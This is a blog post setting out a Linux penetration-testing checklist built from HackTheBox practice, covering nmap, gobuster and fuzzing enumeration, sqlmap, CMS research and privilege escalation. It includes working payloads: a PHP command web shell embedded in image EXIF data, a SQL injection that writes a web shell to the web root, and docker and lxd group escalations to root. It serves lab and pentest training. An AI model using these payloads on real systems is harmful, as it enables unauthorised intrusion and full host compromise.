It happens a lot of times when pentesters miss out a simple thing while pentesting and incomplete enumeration results can cause complications. And in that sense, a checklist can always save you from remembering each and every step of pentest.
In recent months, I solved a lot of hackthebox machines which really helped me build up a penetration methodology. And honestly speaking, there can be multiple ways to approach while pentesting. But there are few steps that remain constant for any server you pick. The key part is to make a thorough enumeration on those so that we dont miss even the slighest potential information that can lead to a compromise.
In this blog post, I will be summarising all the points that one must really look into while testing any linux machine.
Initial foothold
There are manifold ways to get a initial foothold over the box. And it solely depends on the open ports. So lets dig into the common enumeration steps to get the intial foothold over the box.
Run namp scans for both TCP and UDP. Always run a fullport scan alongside.
# nmap -sC -sV 10.10.10.X -o tcp.nmap # nmap -sU -vvv 10.10.10.X -o udp.namp # nmap -p- -sV -A -T4 -vv 10.10.10.X -o fullport.nmap
If port 80 is open
Check for .git
Run a dirbuster/ gobuster scans. Here’s a small script that you can use to run your scan against multiple wordlists and save the output to a file. ( PS: there are scenerios, where a particular wordlist is required to obtain the results.
#!/bin/bash
wordlist=(/usr/share/seclists/Discovery/Web-Content/big.txt /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt /usr/share/wordlists/rockyou.txt)
touch gobuster.scans.out
for w in "${wordlist[@]}"
do
echo ""
echo "$w "
echo "$1"
gobuster -u $1 -w $w -t 50 | tee -a gobuster.scans.out| sort gobuster.scans.out| uniq
done
# usage : bash script.sh http://10.10.10.10
Run gobuster scans with flags like -x php, txt (to enumerate files with extension), -s 200,301,302 (To only look upon certain response codes)
# gobuster -u http://example.com -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50 -x txt
Check the page source
When every word in a wordlist gives a 200 OK or a 301, you need to use a fuzzer. wfuzz and ffuf are best options. Fuzzers can also be used for directory or file enumeration.
# for parameter enumeration > wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.69/sync?FUZZ=test # output after filtering the response size > ./ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://fluxcapacitor.htb/sync\?FUZZ=yesterday -fs 19
Got a login form? Capture the request in burp (save it login.req) and scan for any sql injections
# sqlmap -r login.req --all --batch --level 3 --risk 3
CMS( Content Management System) is present?
If a CMS is present on the box, always search for its directory structure on github. In most of the cases you will be successful in finding one as most of them are open source.
Search for the files where CMS stores its sensitive information such as credentials or config files.
Search for the default credentials of CMS.
Find the version of CMS that is running on the box and perform a searchploit againt it.
# searchsploit CMS
Searching for directory structure can be useful as sometimes the wordlists are unable to bruteforce the directories/files.
Shell upload
Want to upload a shell on places with restricted file types?
With exiftool, one can embed the shell code inside an image. This wont create any hinderance in the extension restriction.
# exiftool -Comment='"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>' master.jpg
If sql injection is present, try uploading the shell.
Firstly, try to enumerate the number of columns present. This can be done using order by clause. After determining the number of columns, combined with union to perform union-based SQL injections. For see practical implementation, visit here.
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php' #
Approaches to privilege escalation
Once inside the box, you get the privilege of using enumeration scripts that do a hell lot of work for you. The best options available are LinEnum.sh and LinPeas.sh.
So lets dig into what to exploit, once indise the box!! Here’s another checklist that can help you get your way through.
Check the contents of /var/www/html for sensitive contents like config files, database files.
Check for users.xml, if tomcat is present
Found sudo ? Do a sudo -l
Check files with suid but set
Check for all the listening ports in the output of netstat. Check if the obtained ports can be mapped to default service. ( PS: One cant always remember 5 digit port number that has a service mapped to it)
If any named service is running, check for its exploits on the version running
A python file runs with sudo privileges? Check for the python path, if we could inject our malicious module in the directory to gain elevated privileges.
# checking python path. Path in which python looks to import its modules/ libraries python -c 'import sys; print(sys.path)';
Docker is present??
Try to find the credentials to get a way inside docker.
Any user is part of docker group? You can easily get a shell. Exploit details can be found here.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
If linux containers are present and any user is part of lxd group, then the account can easily elevate its privileges to root. Find more about lxc here
# lxc image import ./alpine-v3.12-x86_64-20200629_1550.tar.gz --alias myimage # lxc init myimage ignite -c security.privileged=true # lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # lxc start ignite # lxc exec ignite /bin/sh # id
I will be constantly updating this checklist as I find the different attack vectors. You can freely use this checklist while you perform pentest, so that you dont missout the low hanging fruits.
Thats all for the blog post! Until then, happy hunting..